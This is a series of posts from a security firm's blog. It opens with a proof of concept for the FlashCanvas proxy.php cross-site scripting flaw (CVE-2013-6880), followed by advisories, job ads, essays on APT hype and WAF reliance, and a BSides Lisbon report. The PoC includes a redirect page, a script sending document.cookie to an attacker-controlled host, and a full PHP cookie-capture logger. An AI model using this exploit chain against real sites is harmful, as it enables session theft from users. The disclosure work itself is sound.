CVE-2013-6880 Proof of Concept

Marc Wickenden recently discovered a security issue within FlashCanvas 1.5 that could lead to a number of issues, such as cross-site scripting. The issue has been assigned CVE number 2013-6880 and the vendor has now released a fix for the issue, which can be found here. In this blog post we take a closer look at the issue and the proof of concept that shows how this issue can be used to steal session tokens.

 

Vulnerable code

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.

Within the proxy.php file the offending code is:

if (!preg_match('#/flash\d*canvas\.swf$#', $_SERVER['HTTP_REFERER'])) {

 

Creating the exploit

In order to exploit this issue the user needs to already be logged in to the target site and the attacker needs control of a website that can serve a page ending in /flashcanvas.swf

Our malicious /flashcanvas.swf makes a call to the vulnerable proxy.php on the remote site. An attacker entices a victim user to click on a malicious link. This makes a request, for example via a redirect, to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL and renders this in the context of the target site. Page rewrite, script execution, you name it, it becomes possible from this point.

 

POC

We have generated a POC to prove this and can use the flaw to steal session cookies of a victim under the following scenario. In order to exploit this issue the attacker needs control of a website (lets call this delivery.com), that can serve a page ending in /flashcanvas.swf

We then use the following code to make a call to the vulnerable proxy.php on the remote site (lets call this target.com) and redirect the user to our evil site (evil.com). We used a completely separate host in order to ensure this was cross-domain.

On delivery.com we need the following:

-- flashcanvas.swf
 <!DOCTYPE html>
 <html>
 <head>
 <title>CVE 2013 6880 POC</title>
 <meta http-equiv="refresh" content="1;http://www.target.com/FlashCanvas/proxy.php?url=http://evil.com/xss.html">
 </head>
 <body>
 <p>Redirecting...</p>
 </body>
 </html>
--

On the evil.com site our script looks like this:
<script>location.href = 'http://delivery.com/capture.php?cookie='+document.cookie;</script>

The capture.php file on delivery.com is used to record and print out the information sent to the page. It is also included in the access logs of course. For completeness the capture.php is:

<?php
$date = date("dmY");
$timestamp = date("D M j G:i:s T Y");
$collectionfile = "/tmp/collection.$date";
$fh = fopen($collectionfile, "a");
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($fh, "== $timestamp / $ip ==\n");
?>
<html>
<body>
<?php
if (isset($_GET)) {
 fwrite($fh, "== GET ==\n");
 foreach ($_GET as $k => $v) {
 $arr = explode(";", $v);
 foreach ($arr as $vv) {
 $vals = explode("=", $vv);
 print "<p>$vals[0]: $vals[1]</p>";
 }
 fwrite($fh, "$k:$v\n");
 }
}
if (isset($_POST)) {
 fwrite($fh, "== POST ==\n");
 foreach ($_POST as $k => $v) {
 fwrite($fh, "$k:$v\n");
 print "$k: $v\n";
 }
}
fclose($fh);
?>
</body>
</html>

 

Summary

In summary, an attacker entices a victim user to click on the malicious link (http://delivery.com/flashcanvas.swf). This makes a request, in our case we used a redirect to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL (http://evil.com/xss.html) and renders this in the context of the target.com site, including script execution and DOM functionality.

 

Note

By default, under Apache the .swf extension will be served as Shockwave Flash. We require this to be served as a page, so this requires the following configuration changes on the evil.com webserver:

Comment out the following line on /etc/mime.types:

#application/x-shockwave-flash swf swfl

In your apache configuration, change the following file /etc/apache2/mods-enabled/mime.conf and add:

AddType text/html .swf

Don’t forget to reload apache.

CVE-2013-6880 FlashCanvas proxy.php XSS Vulnerability

Advisory Information

Title: FlashCanvas proxy.php XSS Vulnerability

Date published: 11 December 2013

Reference: CVE-2013-6880

Advisory Summary

Script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.

Vendor

FlashCanvas.net <http://flashcanvas.net/>

Affected Software

FlashCanvas 1.5 and possibly older.

FlashCanvas is also used in other software frameworks such as WebShims, therefore the affected software maybe wider.

Description of Issue

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it. This leads to some interesting possibilities, the one proved being cross-site scripting. More technical detail can be found in the following blog post.

Fix

We would recommend updating to version 1.6

Graduate Junior Security Tester Training and Development

As part of our on-going development, 7 Elements is looking to take on another Junior Security Tester in the summer of 2014. Through our dedicated Graduate Junior Security Tester Training and Development Plan they will gain the skills and experience necessary to become an independent, effective and highly skilled manual security tester. More information on this vacancy can be found on our careers page.

CVE-2013-6880 XSS in FlashCanvas Proxy.php

Advisory Information

Title: FlashCanvas proxy.php XSS Vulnerability
Date published: November 2013
Ref: CVE-2013-6880

Advisory Summary

Script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it

Vendor

FlashCanvas.net <http://flashcanvas.net/>

Affected Software

FlashCanvas 1.5 and possibly older.

FlashCanvas is also used in other software frameworks such as WebShims, therefore the affected software maybe wider.

Description of Issue

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it. This leads to some interesting possibilities, the one proved being cross-site scripting.

PoC

For a proof of concept and further discussion, please see our blog on this issue.

Security Testing Scheduler required

e-Placement Scotland are working with us to help find a Security Testing Scheduler.

Security Testing Scheduler:

The role will be based from 7 Elements’ office.
The placement will be for 6 months, starting in January 2014.
Salary £15,000 per annum pro rata.

Apply online here

Senior Security Tester

We are looking for a Senior Security Tester to join the team. We pride ourselves on our expertise in technical information assurance, as such the candidate must have a high level of technical ability and share our passion for information security.

If this sounds like you then visit our careers page to find out more.

Advanced Persistent Threat – Redux

Given that media coverage keeps going in terms of discussing ‘Advanced Persistent Threat’ and the need to keep a balanced view, I thought that I would revisit this topic. We first blogged and presented on this issue back in 2011 and those discussion points appear to still be valid now.

To be fair, I still have a love – hate relationship with the term Advanced Persistent Threat (APT). It is used to describe state sponsored espionage, which i know exists and can be a significant threat to specific entities such as government departments and defence contractors. I’m also aware of APT style attacks on corporate organisations. However, the term can be banded around and badly applied to security ‘hacks’ as well as being seen as a ‘China’ only issue. This is especially true when dealing with the media and specific security vendors. This is the side of APT that I hate.

 

So what is APT anyway?

APT is used to describe a variety of attacks but has its origins in what would be categorised as state sponsored cyber espionage. This traditional cyber espionage was concentrated on government agencies and supporting defence contractors. This has been extended to encompass a wider focus, resulting in what is known today as APT.

The objective of APT can be seen as;

  • Gain access to information,
  • Maintain access to gather large quantities of data,
  • To serve a specific set of goals / objectives.

APT stands for Advanced Persistent Threat. So what do these terms really mean? A number of definitions exist, but from my perspective I see APT as:

Advanced – This relates to the ability of the attacker. It doesn’t however mean that they will only use custom created code to launch what is known as ‘zero day’ attacks on a network. It is important to understand that they will use the path of least resistance when looking to compromise a network. If this can be done through trivially guessable passwords then this is the method they will use, but they have the capability to research and develop new attack code if required.

Persistent – This is a key differentiator with other threat actors. The aim of those conducting APT is to gain access to information. The information that is targeted is of greatest value when gathered in volume. APT attacks therefore seek to maintain access to the network for as long as is required to achieve this. Smash and grab attacks, such as those that target credit card information fall within a different class of threat actor, and should not be confused with APT. However, APT style attacks could be completed in such a fashion if they are able to meet their objectives with one short attack.

Threat – The use of the term threat within the context of APT relates to the fact that this is a targeted attack, which is directed to achieve a defined purpose and has both the intent and capability to gain access to the desired information.

 

So how does APT differ from cybercrime?

For me there is a degree of cross-over between cybercrime and APT. Highly capable threat actors within both areas are highly organised, well-motivated and funded. This makes both these actors a real threat. The key difference between an attack being classified as APT or cybercrime is the intention or driver of the behind attack. At a high-level, cybercrime has a focus on making money by stealing data to commit fraud, APT is looking to gain a commercial advantage through the information that they gain access to.

 

The Hype

APT has become over hyped and this has been used to sell products and services based on the APT threat. As an example, major security vendors now sell anti-APT services and products, with strap lines such as:

“Do You Know if Your Network Has Been Breached by Botnets, Advanced Malware or Persistent Threats?”

“threats such as the Advanced Persistent Threat (APT). These are one of the most dangerous types of threats”

“Introduces New Security Solutions to Counter Advanced Persistent Threats”

“Enterprise Computer Protection from Advanced Malware Threats/APT”

“New Security Solutions to Counter Advanced Persistent Threats”

Tom Reilly (CEO of ArcSight.Symantec) explained that revenue for the second quarter is expected to be in the range of $55 million to $57 million (that is 21%-25% growth over the same quarter last year). This is based partly on “growing cybercriminal activity and heightened awareness of the Advanced Persistent Threat”. So as you can see, APT is big business.

 

Even the media carry provocative statements around this topic that help fuel the hype:

“The APT attackers, however, employ undetectable zero-day exploits and social engineering techniques against company employees to breach networks.”

All of this feeds on the fear, uncertainty and doubt that exists around the term APT and implies the big bad guys are going to get you, regardless of who you are! Media focus is clearly on China and how they are behind all APT attacks. However this paints a very narrow picture of the reality and is predicated by the belief that all APT is state sponsored and worse, that China are the only players. By focusing on just one potential avenue, we may fail to address this issue.

 

The Reality

In reality the threat is wider than that posed by ‘China’, in fact evidence leaked as part of the WikiLeaks stories showed that the US believed that “French espionage is so widespread that the damages [it causes] the German economy are larger as a whole than those caused by China or Russia.” (http://www.ibtimes.com/articles/97534/20110104/france-wikileaks-spying-germany.htm)

If we look more closely at APT, we can see that it falls into two categories. Firstly with its roots firmly as a method of cyber-espionage, it was focused on gaining government information and this would clearly be an activity undertaken by nation states. Secondly as a style of attack that is broadly aligned to gaining access to intellectual property (IP) and commercially sensitive data. This second category indicates that APT style attacks may not just be the preserve of state sponsored entities.

The aim of targeting commercial IP is to gain access to knowledge that can provide a competitive edge, such as blue prints, merger information and strategy documents. This type of information would give competitors an advantage over their rivals and this is the real driving force behind the wider use of attacks classed as APT. These motivating factors could be attributed to individual organisations as well as governments pursuing economic growth. This also extends the threat surface to include those you partner or share information with.

 

Are you at risk?

If we listen to the hype then we are all at risk, even the mighty Google and the IMF have fallen foul of APT! Then again we are not all in the same market as Google (with all its sensitive customer data) or the IMF. So the first question to ask yourself is; do you hold information that someone is willing to spend time and effort in trying to obtain? If the answer is no, then you can sleep soundly in bed at night. Well, from an APT perspective at least. If your own data or that of a client that you hold has value then you will need to consider the threat posed by APT.

I believe that we are at the most risk when we are looking in the wrong direction. Before we became aware of APT, organisations assessed that commercial data that had no value from a cybercrime or fraud perspective wouldn’t be a target in a hack. As a result, breaches went unnoticed. However, this continues to be the case. Why therefore do the attacks go unnoticed, how do they breach the network in the first place? In my opinion a lot of this is down to the wrong focus within the organisation and in what they are trying to protect (if anything!).

What do I mean by this? Well, within the UK we have a number of regulatory drivers that help organisations focus their priorities. The Information Commissioner and Data Protection requirements keep an organisation focused on protecting personal sensitive data. Financial regulation and PCI-DSS keep others focused on protecting financial data, however there is no requirement other than an individual organisations risk appetite in terms of protecting intellectual property. This is exactly what those conducting APT are targeting. They are going for something you didn’t think to protect. You made a risk based decision to focus on regulatory drivers, they made the decision to target your corporate network and steal as much data as they could and then see what was useful.

 

Solutions

So what is the solution? How do we defend against APT? In reality, in the same way you defend against other cyber threats, through a resilient approach to information security. This will depend on how a business approaches risk management, the level of assurance required and based on organisation’s risk appetite.

Any approach taken should be driven by a clear business need and understanding of the risk environment and the organisation’s risk management structure. The business needs to be aware of the threat environment that they are in and be able to make informed decisions, and not just be blinkered into making regulatory based decisions only.

We also need to accept that we are not able to achieve 100% security, especially through appliance based solutions or by just doing penetration testing or by being regulatory compliant. Instead we should approach this problem from the point of view of business resiliency, which captures the ability for an organisation to be robust to attack and to be able to detect / react / recover from an incident. Therefore as an organisation you will need to take steps to look for evidence of compromise and act accordingly if it is found.

What the WAF?

I’ve been noticing a trend from security vendors who promise security-in-a-box solutions and Web Application Firewalls (WAFs) are being promoted as one such solution. Unfortunately, organisations are aligning to this suggestive, albeit dangerous tune.

As a result, organisations choose to filter out traffic that would exploit their known vulnerabilities on their WAFs instead of applying vendor approved updates and fixes, refactoring or rewriting vulnerable code.

Don’t give your WAF the whole responsibility!

A WAF is a piece of software capable of applying a set of rules to an HTTP conversation. These rules will then allow the organisation to make control-flow decisions on the HTTP interaction and therefore help mitigate and protect against certain common attacks on the Web (XSS, SQLi, etc).

In short, it adds an additional layer of security to a web application, which is a good thing. This is done by keeping a separate rule-set for the detection and prevention of attacks, keeping the actual application oblivious to such attempts.

“Just because you feel safe, doesn’t mean that you’re secure”

WAFs exist in many different guises, as network appliances, full-blown applications or even modules running inside of web servers. When correctly deployed, WAFs are a huge help in preventing some common attacks on organisations’ applications. Cross-site scripting, SQL-injection, brute-force attacks are on the top of the list of attacks that you would be able to prevent with the help of a correctly configured WAF.

Of course this doesn’t mean that by having a WAF you don’t have to include security-aware developers and secure coding practices, or stop applying security updates, just because you are “protected” against some of these threats. Security controls should be placed as near as possible to the asset you are trying to protect and a defence-in-depth approach is required. A WAF should therefore be one of many security measures deployed, not relied on in isolation.

“In the absence of other factors, always use the most secure options available.” – Dr. Joel Snyder

Whilst filtering against the input and output of your application might protect you against some of the OWASP-top-ten attacks, WAFs are only able to protect against a few specific and well-known attacks.

Keeping in tune with the “locking doors behind locked doors” mantra that guides the defense-in-depth approach, you should always keep increasing the overall security of your environment to maintain currency with the current threats out there. This should be done by applying security patches, fixing security bugs on software, hardening configurations and establishing and maintaining security baselines.

Security is not a recipe. Security is an on-going process and evolves over time. This process includes installing updates regardless of whether on devices (security patches), people (raising security-awareness) or processes (security reviews).

By relying on a WAF to protect you from a current known weakness and enabling you to avoid the issue of patching, will only lead to more headaches further down the line.

This subject is something that we will explore further in later posts.

 

Security Testing Project Manager

We are looking for a Security Testing Project Manager to join the team.

The role of the Security Testing Project Manager will be to work within 7 Elements’ busy technical team to manage the delivery of security testing whilst ensuring 7 Elements’ high standards of customer service are met.  The main focus of the role is to ensure the smooth and effective delivery of security tests through technical project management. This role is key to the effective functioning of the overall test team. The project manager will be responsible for ensuring process is followed and that standards are met. This will require effective communication with clients and the testing team.

This role is ideal for an individual with a solid technical understanding of information technology and associated terminology and a basic understanding of information security looking for their first role within the information security industry.  The role will allow an individual to gain an understanding of the broad spectrum of security testing in a business environment and the challenges this brings. As a customer facing role it will also enable the individual to gain that vital experience of working with businesses and understanding their requirements.

For further information visit our careers page.

My trip to BSides Lisbon 2013

On the 4th October, I flocked to BSides Lisbon 2013 to talk about Cell Injection.

It was the first meeting of this kind in Portugal (for infosec people by infosec people, open to the general public, free admission, international speakers and attendees). There were about 180 people there in both rooms.

bsides2013

Other than my talk, here’s a rundown of what I saw.

Convincing your friend that a Website sucks by Colin McLean

Colin tried to prove to his friend Mark a website he used wasn’t that safe… and failed. The end result – and a big win – is this talk. We should realise that after all this time, since the beginning of the World Wide Web, we still haven’t been able to prove automatically and successfully if a site is doing something malicious. Colin’s initial solution is a smart mix of proxying, analysis and IDS techniques. It looks very promising. I just hope Colin is able to find a grad student that tackles this issue and fixes it for us!

Security (A)SAP by Bruno Morisson

This talk is about the hugely complex and prevalent CRM system in most large companies in the world and the challenges in keeping these kind of critical systems secure and healthy. Some of the work presented resulted in a Metasploit module for SAP pen-testing. A typical talk at these gatherings.

Digital Forensics on todays’ digital world by David Marques

In this talk, David gave us a general and introductory overview of Digital Forensics. Starting with digital forensic’s history, describing different mindsets between the technical forensicators and legal crowd (judges and lawyers), existing software and usage, explaining current (and future challenges) as a forensics company. Unfortunately, in the end, Q&A fell back to the oldest discussion in the books: “Open-Source” vs “Proprietary” Software. A very good intro to the Digital Forensics’ world, nonetheless.

All your sites are belong to Burp by Tiago Mendo

A plain talk that had a bit for everyone, an introduction to Burp for the newbies and developers and tips that experienced users always enjoy (Macros and Extensions). I also learned about using both Intruder and the Scanner to optimize testing. I actually overheard someone in the room say “where do I sign to get this fantastic piece of software?”. Oh, and I do believe Dafydd Stuttard deserves every penny he is paid for Burp!

“there is no spoon” – The art of “bending” a vulnerability with the power of mind by Pedro Cabrita

Revisiting the idea that automated vulnerability scanning is worth what it is worth, Pedro described several vulnerabilities on a custom tailored app that some of the automated vulnerability scanners couldn’t find. Some of these vulnerabilities were quite basic and immediate that even a more unexperienced tester would find them. While the topic isn’t new, it made a good point since it explains the skewed reality perception organisations have after being submitted to testing. Testing for security isn’t a case of point & shoot or point & click in our case. Just as attackers are somewhat artistic in their trade, so too should testers be. Automated testing tools are just that, tools. Give a skilled tester some good tools and he will deliver.

Revisiting Mac OS X Rootkits by Pedro Vilaça

Unfortunately, I only saw the end of this talk since I was at Pedro Cabrita’s talk but from what I gathered, Pedro is one of the world’s authority on OSX Rootkits and his work is interestingly mindblowing and an eye-opener regarding OSX’s security. One of my favorite talks.

Securing Password Storage – Increasing Resistance to Brute Force Attacks by Tiago Teles

As recent years have shown, storing passwords securely has been proven quite dificult judging by all the password leaks and disclosures even for big players like Yahoo!, Twitter and LinkedIn. After an introduction, design decisions and evolution of hashing functions for password storage, Tiago from Cigital proposed an HMAC based solution to storing user passwords. It was quite an interesting and technical talk with some food for thought on the future of secure password storage and management for organisations.

Man vs Internet or The future of Authentication by Luís Grangeia

Why is it so hard for people (even us, infosec professionals) to properly and securely manage our digital online selves? In his talk, Luis talked about the Mat Honen digital life theft case, authentication and the management of digital identities. It was a basic subject but still something we haven’t completely figured out and often leave to superficial thinking and management without realising we are putting ourselves at unecessary risk with high likelihood of exploitation. Luis finished the talk with some ideas on how to increase our security and raised awareness of these topics. A very interesting talk with a lot of food for thought.

I’m the guy your CSO is STILL warning you about by Gavin Ewan

Gavin is a funny and gifted speaker. He has the heart of a Social Engineer, he lures you in and you’re hopelessly captivated. His words debunk common Social Engineering misconceptions, juicy targets and successful results. It’s funny as legal compliance information disclosure and leaking results so often help out the attacker, especially because they usually end up not being uber-nerdy-obssessive-technical-proficient attackers…. just really motivated beings. Information acquisition is, more often than not, one Google search away! You just need to be smart in how to use it.

Aftermath

Other that the talks, there was a crypto-challenge – decrypting a file containing an encrypted version of the SGFja2VyJ3MgTWFuaWZlc3Rv (spoiler avoided by b64-encoding) – and two attendees signed up for lightning talks. For this, the participants won the possibility of having dinner with the speakers.

Dinner ensued at a brazilian meat restaurant “Orizon” where almost all speakers met (I missed all the other Scots who traveled to Portugal for the event!) followed by drinks at Expo’s Peter’s for wrapping up.
All in all, a good InfoSec informal meeting. I was pleased to see that some of the talks developed on ideas from previous shorter talks from “Confraria da Segurança Informática”, a monthly InfoSec meeting very much in the spirit of BSides only smaller. They have an active community there.

Congratulations to Tiago Henriques and Bruno Morisson for making this event happen. Next year, we might have a BeachCon…
Looking forward to BSides Lisbon 2014!